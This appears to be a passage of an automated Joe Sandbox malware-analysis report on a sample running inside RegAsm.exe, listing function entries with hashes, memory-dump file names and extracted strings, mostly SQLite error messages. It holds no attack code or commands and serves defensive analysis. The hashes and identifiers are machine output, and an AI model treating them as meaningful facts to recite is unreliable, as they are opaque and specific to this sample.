                                                                                                                                                                                                • Opcode Fuzzy Hash: a10310a5beb8e6b2362bc1ef26a1ee171380ee08742ace6ef0a7a288a273b569
                                                                                                                                                                                                • Instruction Fuzzy Hash: 08319EB1900219ABCB00DFA5DC81AEEBB78EF44354F10453BF912BB1D5D778AA14CA58
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B56EBD0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • database corruption, xrefs: 1B56EC4C
                                                                                                                                                                                                • CREATE , xrefs: 1B56EBFF
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B56EC51
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B56EC42
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$CREATE $database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                • API String ID: 0-1360532505
                                                                                                                                                                                                • Opcode ID: 7ffa8636b262ffb0df9a7936da06d2291f973d14da7c040bb77f7ece036a9ae6
                                                                                                                                                                                                • Instruction ID: 812f77a341825c33e16e2bf1059f88d091e95a303670666d783b515b2b5e173d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7ffa8636b262ffb0df9a7936da06d2291f973d14da7c040bb77f7ece036a9ae6
                                                                                                                                                                                                • Instruction Fuzzy Hash: 01313C625053C19EFF214B699C40BF67FA1AB5539AF1401FBF8C54A142F7269580E731
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4C7050 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 98COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: API call with %s database connection pointer$bad parameter or other API misuse$invalid$out of memory
                                                                                                                                                                                                • API String ID: 0-453588374
                                                                                                                                                                                                • Opcode ID: afbb279cb9d71bf3953ecfd920b39d040ddeaa5069e6b26bcb1ccf9a31d1f46a
                                                                                                                                                                                                • Instruction ID: d3899a12ceede52628e91811af131c664c9939ebd1c12081bd03d8f4ad048fa6
                                                                                                                                                                                                • Opcode Fuzzy Hash: afbb279cb9d71bf3953ecfd920b39d040ddeaa5069e6b26bcb1ccf9a31d1f46a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 653125B990074057EB28CA25EC06BEB235B5BD0F15F29C429E4C59A342EA29E8878791
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B5493A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 93COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                • API String ID: 0-2528248365
                                                                                                                                                                                                • Opcode ID: 89f835234ccc2f1204f4c2dc90640c1dcab4e20a551e9bac9030d573ae9b3bc3
                                                                                                                                                                                                • Instruction ID: 30459d0692fc87d67ecba9e35353673ee16c608c8d07b40c86f6d0ee170af1a5
                                                                                                                                                                                                • Opcode Fuzzy Hash: 89f835234ccc2f1204f4c2dc90640c1dcab4e20a551e9bac9030d573ae9b3bc3
                                                                                                                                                                                                • Instruction Fuzzy Hash: D0312B797007909ED724DF28C991AF3BFF2AF99701B54859CD5C647786E322E841C760
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4D4F40 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 91COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                • API String ID: 0-2528248365
                                                                                                                                                                                                • Opcode ID: 6a3b2ebfd5293696c0530ae4d79350cbc4224a927ea99cb2596257b2fdfe940f
                                                                                                                                                                                                • Instruction ID: c71767a39eb4191d008826bc0708d0f6fe8686ebec31ce59303233a07c37f8ea
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a3b2ebfd5293696c0530ae4d79350cbc4224a927ea99cb2596257b2fdfe940f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3731E87620464167C7119B29DD91BE6BFF0FF55312F08826AF458CB682D315E56097E0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4A1C60 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 88COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • misuse, xrefs: 1B4A1D46
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B4A1D4B
                                                                                                                                                                                                • unknown database: %s, xrefs: 1B4A1CBD
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4A1D3C
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unknown database: %s
                                                                                                                                                                                                • API String ID: 0-142545749
                                                                                                                                                                                                • Opcode ID: d469296fc88d2a4bc16b5d0caa25f227fc66e5f95b9a1719c28c6302a6dcc7da
                                                                                                                                                                                                • Instruction ID: 8c8bc4408412691fac5ffa53ab6e8ba93419a56c87f9744fbaf520d13ddf31ae
                                                                                                                                                                                                • Opcode Fuzzy Hash: d469296fc88d2a4bc16b5d0caa25f227fc66e5f95b9a1719c28c6302a6dcc7da
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E21E2B5600741ABE7109B37EC44FDB7AA99FE33A9F00852CF89656381D721A505C772
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4D3FF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 85COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                • API String ID: 0-2528248365
                                                                                                                                                                                                • Opcode ID: d196f24e7a3e32e0f378c61ed39c9b8399bcbd1cfb105425b7f73cd9b7564d33
                                                                                                                                                                                                • Instruction ID: ab0440df05766d42f93edf920dc18c47b3018df89a253bdb25b8fce6b5d2c993
                                                                                                                                                                                                • Opcode Fuzzy Hash: d196f24e7a3e32e0f378c61ed39c9b8399bcbd1cfb105425b7f73cd9b7564d33
                                                                                                                                                                                                • Instruction Fuzzy Hash: E121F8B77003115BCB00EF18EC416EB7BE0EBA8651F41852AFD84D7341E325D55987E2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B549290 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 70COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                • API String ID: 0-2528248365
                                                                                                                                                                                                • Opcode ID: eace1da236967c571629836e4f42c79364e55efe3d8ae2eae6794d4754787141
                                                                                                                                                                                                • Instruction ID: ce05444302f87699733b197a2afb8e20f87c6531dc723d72895bd34fee6c7163
                                                                                                                                                                                                • Opcode Fuzzy Hash: eace1da236967c571629836e4f42c79364e55efe3d8ae2eae6794d4754787141
                                                                                                                                                                                                • Instruction Fuzzy Hash: 59219B36604B909AD7219F289D82AE3BFF29F59301B44859CE1D287396F332F4818790
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040CF35 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0040CF4C
                                                                                                                                                                                                  • Part of subcall function 0041D590: std::exception::exception.LIBCMT ref: 0041D5A5
                                                                                                                                                                                                  • Part of subcall function 0041D590: __CxxThrowException@8.LIBCMT ref: 0041D5BA
                                                                                                                                                                                                  • Part of subcall function 0041D590: std::exception::exception.LIBCMT ref: 0041D5CB
                                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0040CF6E
                                                                                                                                                                                                • memcpy.MSVCRT ref: 0040CFAB
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throwmemcpy
                                                                                                                                                                                                • String ID: invalid string position$string too long
                                                                                                                                                                                                • API String ID: 214693668-4289949731
                                                                                                                                                                                                • Opcode ID: e8649d6854edcdf6cfa96b7bf6223182271f1766ac493d023adf57e450021f61
                                                                                                                                                                                                • Instruction ID: b0c2c1f02c177d2dc43bd4333e285784eff5f350866f00ec72c68241579f9700
                                                                                                                                                                                                • Opcode Fuzzy Hash: e8649d6854edcdf6cfa96b7bf6223182271f1766ac493d023adf57e450021f61
                                                                                                                                                                                                • Instruction Fuzzy Hash: 23117972300211DBDB24DF2CD9C1A5AB3AAEB05714B100A2AF552EB2C1D778E944879A
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4B33C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • CREATE TABLE x(pgno INTEGER PRIMARY KEY, data BLOB, schema HIDDEN), xrefs: 1B4B33D6
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: CREATE TABLE x(pgno INTEGER PRIMARY KEY, data BLOB, schema HIDDEN)
                                                                                                                                                                                                • API String ID: 0-1935849370
                                                                                                                                                                                                • Opcode ID: 94dfe5136be57c63567d8dcb77186c45d922ba67cca292fdb42e550f24926504
                                                                                                                                                                                                • Instruction ID: f5547fcabe5cb94037d86a02d978ac7105c50c534a52f26f98750517e008a4d0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 94dfe5136be57c63567d8dcb77186c45d922ba67cca292fdb42e550f24926504
                                                                                                                                                                                                • Instruction Fuzzy Hash: A60196397442165ADB05DF29E8417CAB7D5EFC5311F05C17AF6048B240EB70A84787A1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B645BC1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,164B22F7,?,?,00000000,1B69D1CB,000000FF,?,1B645B30,?,?,1B645ADF,?), ref: 1B645BF6
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 1B645C08
                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,1B69D1CB,000000FF,?,1B645B30,?,?,1B645ADF,?), ref: 1B645C2A
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                • Opcode ID: 3516af63af31fe14dd3d29db229c82bff14004516d00286ed8e0c05aa4156a36
                                                                                                                                                                                                • Instruction ID: 7cdeca58a17064a0c6d8980f6aab861a2e7f642906d100756a0d06190aa459a5
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3516af63af31fe14dd3d29db229c82bff14004516d00286ed8e0c05aa4156a36
                                                                                                                                                                                                • Instruction Fuzzy Hash: 640162B2914529AFDB058F90CD44BFEB7BCFB68715F004A29F851A2680DB79D904CB50
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B5B6A20 Relevance: 8.0, APIs: 5, Instructions: 485COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
